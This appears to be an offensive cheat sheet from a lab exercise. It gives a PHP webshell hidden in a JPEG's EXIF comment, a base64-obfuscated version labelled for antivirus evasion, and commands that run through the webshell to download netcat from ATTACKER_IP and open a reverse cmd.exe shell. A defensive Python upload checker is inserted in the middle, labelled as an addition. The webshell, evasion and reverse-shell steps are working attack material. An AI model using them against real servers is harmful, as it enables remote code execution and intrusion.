PHP Payload in Image ExifData

  • Test
exiftool -Comment="<?php echo \"<pre>Test Payload</pre>\"; die(); ?>" test-USERNAME.jpeg.php
  • Build Payload with AV evasion
<?php
    $cmd = $_GET["wreath"];
    if (isset($cmd)){
        echo "<pre>" . shell_exec($cmd) . "</pre>";
    }
    die();
?>
<?php \$p0=\$_GET[base64_decode('d3JlYXRo')];if(isset(\$p0)){echo base64_decode('PHByZT4=').shell_exec(\$p0).base64_decode('PC9wcmU+');}die();?>
  • Upload the file and execute commands through the GET parameter, e.g. ?wreath=systeminfo
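
On the receiving side, an upload handler can catch this technique before the file is stored. The following is an added example, not part of the original cheat sheet: it walks the JPEG header segments, flags a PHP open tag in the comment segment (where exiftool's -Comment tag is stored for JPEG files) or in EXIF/IPTC metadata, and rejects script extensions such as the `.jpeg.php` name used above. The function names and sample bytes are constructed for illustration.

```python
import re
import struct

PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)
# Matches .php/.php5/.phtml/.phar as the last extension or in the middle of the name.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.IGNORECASE)
METADATA_MARKERS = {0xFE: "COM", 0xE1: "APP1/EXIF", 0xED: "APP13/IPTC"}

def jpeg_segments(data):
    """Yield (marker, payload) for each header segment up to start-of-scan."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI marker)")
    pos = 2
    while pos + 4 <= len(data) and data[pos] == 0xFF:
        marker = data[pos + 1]
        if marker in (0xDA, 0xD9):  # SOS / EOI: no more metadata segments
            return
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        if length < 2:
            raise ValueError("corrupt segment length")
        yield marker, data[pos + 4:pos + 2 + length]
        pos += 2 + length

def inspect_upload(filename, data):
    """Return a list of reasons to reject the upload (empty list = no finding)."""
    findings = []
    if SCRIPT_EXT.search(filename):
        findings.append("script extension in filename")
    try:
        for marker, payload in jpeg_segments(data):
            name = METADATA_MARKERS.get(marker)
            if name and PHP_TAG.search(payload):
                findings.append(f"PHP open tag in {name} segment")
    except ValueError as exc:
        findings.append(str(exc))
    return findings

def _com(text):
    """Build a JPEG COM segment (length field includes its own two bytes)."""
    return b"\xff\xfe" + struct.pack(">H", len(text) + 2) + text

# Constructed samples: header-only JPEG skeletons, not real images.
CLEAN = b"\xff\xd8" + _com(b"holiday photo") + b"\xff\xd9"
TAGGED = b"\xff\xd8" + _com(b"<?php echo 'marker'; ?>") + b"\xff\xd9"

if __name__ == "__main__":
    print(inspect_upload("cat.jpeg", CLEAN))
    print(inspect_upload("test-USERNAME.jpeg.php", TAGGED))
```

The base64-obfuscated variant above still starts with `<?php`, so the open-tag match catches it even though strings such as `shell_exec` are hidden. The check complements, and does not replace, re-encoding uploaded images and serving the upload directory without PHP execution.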

Uploading Reverse Shell through Webshell

  • Parameter for Webshell
curl http://ATTACKER_IP/nc.exe -o c:\\windows\\temp\\nc-USERNAME.exe
  • Trigger uploaded netcat
powershell.exe c:\\windows\\temp\\nc-USERNAME.exe ATTACKER_IP ATTACKER_PORT -e cmd.exe